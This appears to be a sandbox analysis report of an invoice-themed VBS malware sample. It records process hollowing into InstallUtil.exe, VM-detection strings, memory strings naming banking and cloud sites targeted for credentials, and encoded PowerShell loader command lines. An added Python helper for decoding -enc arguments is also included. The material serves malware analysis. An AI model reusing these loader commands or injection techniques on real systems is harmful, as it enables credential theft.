Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: InstallUtil.exe, 00000009.00000002.1450013749.000000000082F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: InstallUtil.exe, 00000011.00000002.1613446812.0000000001281000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2B440 LdrInitializeThunk, 9_2_04F2B440
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46C000
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46E000
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 2F1008
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46C000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46E000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: F21008
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc 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
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc [base64-encoded PowerShell command line omitted]
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0a
iaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "c:\users\user\appdata\roaming\osdescription.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeua
bgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0a
iaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "c:\users\user\appdata\roaming\osdescription.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa
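The -enc argument in the process-creation entry above is a PowerShell -EncodedCommand payload: the script as UTF-16LE text, base64-encoded. Note that the entry renders the whole command line case-folded (the image path in the same entry is lowercased as well), and base64 is case-sensitive, so the blob as printed on this page does not decode; it has to be recovered from the original process-creation event. The Python helper below is an added example, not code from the report or from the sample: it pulls the -enc argument out of a process-creation line, decodes it, and flags a blob that has lost its case in transit. The log lines it runs on are constructed for the demonstration (the image path reuses the one in the entry above; the script inside is a harmless stand-in).

```python
"""Decode a PowerShell -EncodedCommand (-enc) argument from a process-creation log line.

Added example; not code from the sandbox report.  The log lines in SAMPLE_LINES
are constructed for this demonstration.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# match every prefix, longest first, followed by a base64 token.
_PREFIXES = sorted(("encodedcommand"[:n] for n in range(1, 15)), key=len, reverse=True)
ENC_RE = re.compile(
    r"(?:^|\s)-(?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def encode_command(script: str) -> str:
    """Produce the blob powershell.exe expects: the script as UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Reverse of encode_command(); raises ValueError/UnicodeDecodeError on bad input."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def looks_like_script(text: str) -> bool:
    """True when the decoded text is printable ASCII (plus tab/newline), i.e. plausibly a script."""
    return all(32 <= ord(c) < 127 or c in "\r\n\t" for c in text)


def analyze_process_line(line: str) -> dict:
    """Extract and decode the -enc argument of one process-creation line.

    'status' is one of: no-encoded-command, decoded, garbled, undecodable.
    'all_lowercase' flags a blob with no upper-case letters.  Base64 of UTF-16LE text
    always contains upper-case characters (the 0x00 high bytes encode as 'A'), so such a
    blob was almost certainly case-folded by the logging or reporting pipeline and is
    not recoverable from the log text alone.
    """
    m = ENC_RE.search(line)
    if not m:
        return {"status": "no-encoded-command"}
    blob = m.group(1)
    result = {
        "blob": blob,
        "all_lowercase": blob == blob.lower() and any(c.isalpha() for c in blob),
    }
    try:
        text = decode_encoded_command(blob)
    except (ValueError, UnicodeDecodeError):
        result["status"] = "undecodable"
        return result
    if looks_like_script(text):
        result["status"] = "decoded"
        result["script"] = text
    else:
        result["status"] = "garbled"
    return result


# Constructed stand-in script (harmless) and constructed log lines for the demo.
SAMPLE_SCRIPT = "$b = [Convert]::FromBase64String('QUJD'); Write-Output $b.Length"
_IMAGE = r"C:\Users\user\AppData\Roaming\OSDescription.vbs.exe"
_FAITHFUL = f'Process created: {_IMAGE} "{_IMAGE}" -enc {encode_command(SAMPLE_SCRIPT)}'
SAMPLE_LINES = [
    _FAITHFUL,          # constructed: command line recorded with its case intact
    _FAITHFUL.lower(),  # constructed: the same line after a case-folding pipeline
    r"Process created: C:\Windows\System32\wscript.exe wscript.exe invoice.vbs",  # constructed: no -enc
]

if __name__ == "__main__":
    for sample in SAMPLE_LINES:
        r = analyze_process_line(sample)
        print(r["status"], "| all_lowercase =", r.get("all_lowercase"), "|", r.get("script", ""))
```

Run as-is, the first constructed line decodes to the stand-in script, the second is reported as garbled or undecodable with all_lowercase set, and the third has no encoded command. When an entry like the one above is all lower case, go back to the raw process-creation event (EDR telemetry, Sysmon event ID 1, or the sandbox's own process dump) rather than attempting to guess the original case.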
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\ VolumeInformation
